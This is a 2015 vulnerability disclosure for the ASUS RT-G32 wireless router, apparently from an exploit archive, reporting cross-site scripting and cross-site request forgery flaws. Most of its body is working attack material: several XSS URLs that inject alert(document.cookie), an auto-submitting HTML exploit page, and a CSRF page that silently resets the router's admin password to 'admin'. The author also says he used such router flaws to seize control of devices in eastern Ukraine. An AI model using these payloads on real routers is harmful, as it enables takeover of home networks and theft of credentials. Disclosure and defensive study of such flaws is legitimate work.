ASUS RT-G32 Cross Site Request Forgery / Cross Site Scripting

ASUS RT-G32 Cross Site Request Forgery / Cross Site Scripting: Posted Mar 7, 2015; Authored by MustLive; ASUS RT-G32 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | c34493ee04f35bcd91d2cca336c9426c6e04dfabdb8828db329cb24360c34164; Download | Favorite | View

ASUS RT-G32 Cross Site Request Forgery / Cross Site Scripting

Hello list!

There are Cross-Site Scripting and Cross-Site Request Forgery
vulnerabilities in ASUS Wireless Router RT-G32.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: ASUS RT-G32 with different versions of
firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and
2.0.3.2.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27

http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27

http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27

http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

These vulnerabilities work as via GET, as via POST (work even without
authorization).

ASUS RT-G32 XSS-1.html

<html>
<head>
<title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="next_page" value="'+alert(document.cookie)+'">
<input type="hidden" name="group_id" value="'+alert(document.cookie)+'">
<input type="hidden" name="action_script"
value="'+alert(document.cookie)+'">
<input type="hidden" name="flag" value="'+alert(document.cookie)+'">
</form>
</body>
</html>

Cross-Site Request Forgery (WASC-09):

CSRF vulnerability allows to change different settings, including admin's
password. As I showed in this exploit (post-auth).

ASUS RT-G32 CSRF-1.html

<html>
<head>
<title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="http_passwd" value="admin">
<input type="hidden" name="http_passwd2" value="admin">
<input type="hidden" name="v_password2" value="admin">
<input type="hidden" name="action_mode" value="+Apply+">
</form>
</body>
</html>

I found this and other routers since summer to take control over terrorists
in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html)
and in many my interviews
(http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/7644/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

ASUS RT-G32 Cross Site Request Forgery / Cross Site Scripting

ASUS RT-G32 Cross Site Request Forgery / Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ASUS RT-G32 Cross Site Request Forgery / Cross Site Scripting

Share This

ASUS RT-G32 Cross Site Request Forgery / Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems